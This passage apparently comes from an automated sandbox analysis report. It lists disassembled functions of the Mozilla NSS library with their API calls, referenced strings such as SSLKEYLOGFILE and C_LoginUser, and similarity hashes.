Part of subcall function 6CE82F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CE82F0A
Part of subcall function 6CE82F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE82F1D

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CEAA015

Part of subcall function 6CEC1940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6CEC563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6CEC195C
Part of subcall function 6CEC1940: EnterCriticalSection.KERNEL32(?,?,6CEC563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6CE9EAC5,00000001), ref: 6CEC1970
Part of subcall function 6CEC1940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6CE9EAC5,00000001,?,6CE9CE9B,00000001,6CE9EAC5), ref: 6CEC19A0

PL_FreeArenaPool.NSS3(?), ref: 6CEAA067
PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CEAA055

Part of subcall function 6CE04C70: TlsGetValue.KERNEL32(?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04C97
Part of subcall function 6CE04C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04CB0
Part of subcall function 6CE04C70: PR_Unlock.NSS3(?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04CC9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEAA07E
PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CEAA0B1
PL_FreeArenaPool.NSS3(?), ref: 6CEAA0C7
PL_FinishArenaPool.NSS3(?), ref: 6CEAA0CF
PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CEAA12E
PL_FreeArenaPool.NSS3(?), ref: 6CEAA140
PL_FinishArenaPool.NSS3(?), ref: 6CEAA148
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEAA158
PL_FinishArenaPool.NSS3(?), ref: 6CEAA175
CERT_AddCertToListTail.NSS3(00000000,00000000), ref: 6CEAA1A5
CERT_DestroyCertificate.NSS3(00000000), ref: 6CEAA1B2
free.MOZGLUE(00000000), ref: 6CEAA1C6
CERT_DestroyCertList.NSS3(00000000), ref: 6CEAA1D6

Part of subcall function 6CEC55E0: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,6CE9EAC5,00000001,?,6CE9CE9B,00000001,6CE9EAC5,00000003,-00000004,00000000,?,6CE9EAC5), ref: 6CEC5627
Part of subcall function 6CEC55E0: PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0,?,?,?,?,?,?,?,?,?,?,6CE9EAC5,00000001,?,6CE9CE9B), ref: 6CEC564F
Part of subcall function 6CEC55E0: PL_FreeArenaPool.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CE9EAC5,00000001), ref: 6CEC5661
Part of subcall function 6CEC55E0: PR_SetError.NSS3(FFFFE01A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE9EAC5), ref: 6CEC56AF

Strings

security, xrefs: 6CEAA00F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Arena$Pool$CallFreeOnce$CertErrorFinishList$CriticalDestroyEnterInitSectionUnlockUtilValue$Alloc_Arena_CertificateTailfree
String ID: security
API String ID: 3250630715-3315324353
Opcode ID: bb31e5df51d808d69576b43c37d6d8b8aeb46da4b13892456cf8a652ccfa1c2e
Instruction ID: a51e2dc2aeed04ea999f8e4cebb718c4ff556f7a55c8180648ea96f26b21aa5d
Opcode Fuzzy Hash: bb31e5df51d808d69576b43c37d6d8b8aeb46da4b13892456cf8a652ccfa1c2e
Instruction Fuzzy Hash: 5A51D8B1E403096FEB119BE5DC84BAE7378AF5974CF300029E905AFB41E775950ACB92

Function 6CEC4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CEC4C4C
EnterCriticalSection.KERNEL32(?), ref: 6CEC4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CEC4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC4DB7

Part of subcall function 6CF2DD70: TlsGetValue.KERNEL32 ref: 6CF2DD8C
Part of subcall function 6CF2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF2DDB4

Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707AD
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707CD
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707D6
Part of subcall function 6CE707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CE0204A), ref: 6CE707E4
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,6CE0204A), ref: 6CE70864
Part of subcall function 6CE707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE70880
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,6CE0204A), ref: 6CE708CB
Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(?,?,6CE0204A), ref: 6CE708D7
Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(?,?,6CE0204A), ref: 6CE708FB

TlsGetValue.KERNEL32 ref: 6CEC4DD7
EnterCriticalSection.KERNEL32(?), ref: 6CEC4DEC
PR_Unlock.NSS3(?), ref: 6CEC4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6CEC4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6CEC4E71
free.MOZGLUE(00000000), ref: 6CEC4E7A
PR_Unlock.NSS3(?), ref: 6CEC4EA2
TlsGetValue.KERNEL32 ref: 6CEC4EC1
EnterCriticalSection.KERNEL32(?), ref: 6CEC4ED6
PR_Unlock.NSS3(?), ref: 6CEC4F01
free.MOZGLUE(00000000), ref: 6CEC4F2A

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 6ffe099877773f46f87e318af2188f636a2144fe5454dff181651d855224f99f
Instruction ID: 2059a8c1790c4bf1fdf37b5d14f302876d8f309ea0b4cfb3c6a877eaf3b01bef
Opcode Fuzzy Hash: 6ffe099877773f46f87e318af2188f636a2144fe5454dff181651d855224f99f
Instruction Fuzzy Hash: B8B11371F002059FEB40EF68D940BAA77B4BF09318F254129ED259BB11EB34E961CBD2

Function 6CECFFB0 Relevance: 30.1, APIs: 20, Instructions: 68COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CECFFB4

Part of subcall function 6CF498D0: calloc.MOZGLUE(00000001,00000084,6CE70936,00000001,?,6CE7102C), ref: 6CF498E5

PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CECFFC6

Part of subcall function 6CF498D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CF49946
Part of subcall function 6CF498D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE016B7,00000000), ref: 6CF4994E
Part of subcall function 6CF498D0: free.MOZGLUE(00000000), ref: 6CF4995E

PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CECFFD6
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CECFFE6
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CECFFF6
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED0006
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED0016
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED0026
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED0036
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED0046
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED0056
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED0066
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED0076
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED0086
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED0096
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED00A6
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED00B6
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED00C6
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED00D6
PR_NewLock.NSS3(?,?,6CEC76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CED00E6

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
String ID:
API String ID: 1407103528-0
Opcode ID: 318627c730e4fc7418084243698eab799bc1be2d5b9b002249391bef241a9a88
Instruction ID: 1749977245aba9ec23fb3b4b1804a8d503ef5571b362dad7c4fa1c6b53044c21
Opcode Fuzzy Hash: 318627c730e4fc7418084243698eab799bc1be2d5b9b002249391bef241a9a88
Instruction Fuzzy Hash: 96310AF0F2161ABE8BC6DF6996487493EB8B71E604750A21AD00486703FFB6024DCF96

Function 6CF16E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CF16BF7), ref: 6CF16EB6

Part of subcall function 6CE71240: TlsGetValue.KERNEL32(00000040,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE71267
Part of subcall function 6CE71240: EnterCriticalSection.KERNEL32(?,?,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE7127C
Part of subcall function 6CE71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE71291
Part of subcall function 6CE71240: PR_Unlock.NSS3(?,?,?,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE712A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CFBFC0A,6CF16BF7), ref: 6CF16ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CF16EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CF16EFC
PR_NewLock.NSS3 ref: 6CF16F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CF16F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CF16BF7), ref: 6CF16F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CF16BF7), ref: 6CF16F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CF16BF7), ref: 6CF16FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CF16BF7), ref: 6CF16FFD

Strings

# SSL/TLS secrets log file, generated by NSS, xrefs: 6CF16EF7
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CF16F4F
NSS_SSL_CBC_RANDOM_IV, xrefs: 6CF16FF8
SSLKEYLOGFILE, xrefs: 6CF16EB1
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CF16FDB
SSLFORCELOCKS, xrefs: 6CF16F2B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 333883c3d69ccd82703e57acdecd1a6bd483bacf1c9d6e77f311b6529d087622
Instruction ID: c7049333e33dc867867494179cb60975393d9d2cab57b53be77b0208317f0ff6
Opcode Fuzzy Hash: 333883c3d69ccd82703e57acdecd1a6bd483bacf1c9d6e77f311b6529d087622
Instruction Fuzzy Hash: FFA105B3F6D9D197E7A0463CCC0039532A2AB8B329F68436AE839C6ED4EF7594408741

Function 6CE95DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE95DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CE95E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6CE95E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6CE95E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CE95EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CE95ED9
SECKEY_SignatureLen.NSS3(?), ref: 6CE95F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CE95F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CE95F89
free.MOZGLUE(?), ref: 6CE95FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CE95FB6
free.MOZGLUE(00000000), ref: 6CE95FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CE9600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CE96079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE96084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE96094

Strings

, xrefs: 6CE95EEB

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: f8ad6abebd597bd7dd3875beb0cd6f75d314f2a9b76d4b656fabadda3963b95e
Instruction ID: 253e3d07c8d885af4c1e5886ecbf2a23fb0070ac9ef76421f67b5210cb308ef4
Opcode Fuzzy Hash: f8ad6abebd597bd7dd3875beb0cd6f75d314f2a9b76d4b656fabadda3963b95e
Instruction Fuzzy Hash: B38104B1E052059BDF10CE64DC85BAE77B5AF0932DF244228E81AE7791E731E805CBD2

Function 6CEB6D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6CEB6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB6DC3

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CEB6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CEB6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CEB6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CEB6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CEB6EB9

Strings

pulDigestLen = 0x%p, xrefs: 6CEB6E42
ulDataLen = %d, xrefs: 6CEB6E0E
*pulDigestLen = 0x%x, xrefs: 6CEB6EB4
pData = 0x%p, xrefs: 6CEB6DF5
C_Digest, xrefs: 6CEB6D81
pDigest = 0x%p, xrefs: 6CEB6E27
hSession = 0x%x, xrefs: 6CEB6D9E, 6CEB6DAE
(CK_INVALID_HANDLE), xrefs: 6CEB6DBC

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: 6312e0e4c431de50015ae0c5a107c82bf3bd0f06ae71df547828046f53f25f63
Instruction ID: 89c1555e041ca66e2f8bed81ed0e971ec703143b9be1979baea7d6d50c902de2
Opcode Fuzzy Hash: 6312e0e4c431de50015ae0c5a107c82bf3bd0f06ae71df547828046f53f25f63
Instruction Fuzzy Hash: 8B411731A11005FFDB44DF54DE48F9A7BB5AB4A30CF154028F808A7711DF329A19CB91

Function 6CEB9C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_LoginUser), ref: 6CEB9C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB9C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB9CA3

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB9CB9
PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6CEB9CDA
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CEB9CF5
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CEB9D10
PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6CEB9D29
PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6CEB9D42

Strings

pUsername = 0x%p, xrefs: 6CEB9D24
C_LoginUser, xrefs: 6CEB9C61
pPin = 0x%p, xrefs: 6CEB9CF0
userType = 0x%x, xrefs: 6CEB9CD5
ulUsernameLen = %d, xrefs: 6CEB9D3D
ulPinLen = %d, xrefs: 6CEB9D0B
hSession = 0x%x, xrefs: 6CEB9C7E, 6CEB9C8E
(CK_INVALID_HANDLE), xrefs: 6CEB9C9C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
API String ID: 1003633598-3838449515
Opcode ID: 8ca6a7073c4d066bec62391fd418077e6b1cdb10e332443473bf2c071c9074e3
Instruction ID: 6d6135d0ff2d5de00ec100d03d2dcf78a0dc48882dc21be7856ecad062b76093
Opcode Fuzzy Hash: 8ca6a7073c4d066bec62391fd418077e6b1cdb10e332443473bf2c071c9074e3
Instruction Fuzzy Hash: 3741D435A01105FFDB84DF55DE48BAA7BB1AB5A30EF194028F50877711DB329918CBA2

Function 6CE71FE0 Relevance: 28.8, APIs: 19, Instructions: 254COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6CE72007
calloc.MOZGLUE(00000001,00000084), ref: 6CE72077
calloc.MOZGLUE(00000001,0000002C), ref: 6CE720DF
TlsSetValue.KERNEL32(00000000), ref: 6CE72188
PR_NewCondVar.NSS3 ref: 6CE721B7
calloc.MOZGLUE(00000001,00000084), ref: 6CE7221C
InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CE722C2
GetLastError.KERNEL32 ref: 6CE722CD
free.MOZGLUE(00000000), ref: 6CE722DD

Part of subcall function 6CE70F00: PR_GetPageSize.NSS3(6CE70936,FFFFE8AE,?,6CE016B7,00000000,?,6CE70936,00000000,?,6CE0204A), ref: 6CE70F1B
Part of subcall function 6CE70F00: PR_NewLogModule.NSS3(clock,6CE70936,FFFFE8AE,?,6CE016B7,00000000,?,6CE70936,00000000,?,6CE0204A), ref: 6CE70F25

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
String ID:
API String ID: 3559583721-0
Opcode ID: 44c876a3a8985b62d618ed73756a457fed4bbd05d7a1c82e7fdc87085a114f70
Instruction ID: e5b964363613d53ee0033ec421321fbd560deb8890194a1d977b48db74f2505d
Opcode Fuzzy Hash: 44c876a3a8985b62d618ed73756a457fed4bbd05d7a1c82e7fdc87085a114f70
Instruction Fuzzy Hash: ED916E71A11742EFDBA4DF38D80975A7BF4BB0A708F10452EE54AD6B80EB71A105CBA1

Function 6CF99C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6CF99C70
PR_NewLock.NSS3 ref: 6CF99C85

Part of subcall function 6CF498D0: calloc.MOZGLUE(00000001,00000084,6CE70936,00000001,?,6CE7102C), ref: 6CF498E5

PR_NewCondVar.NSS3(00000000), ref: 6CF99C96

Part of subcall function 6CE6BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CE721BC), ref: 6CE6BB8C

PR_NewLock.NSS3 ref: 6CF99CA9

Part of subcall function 6CF498D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CF49946
Part of subcall function 6CF498D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE016B7,00000000), ref: 6CF4994E
Part of subcall function 6CF498D0: free.MOZGLUE(00000000), ref: 6CF4995E

PR_NewLock.NSS3 ref: 6CF99CB9
PR_NewLock.NSS3 ref: 6CF99CC9
PR_NewCondVar.NSS3(00000000), ref: 6CF99CDA

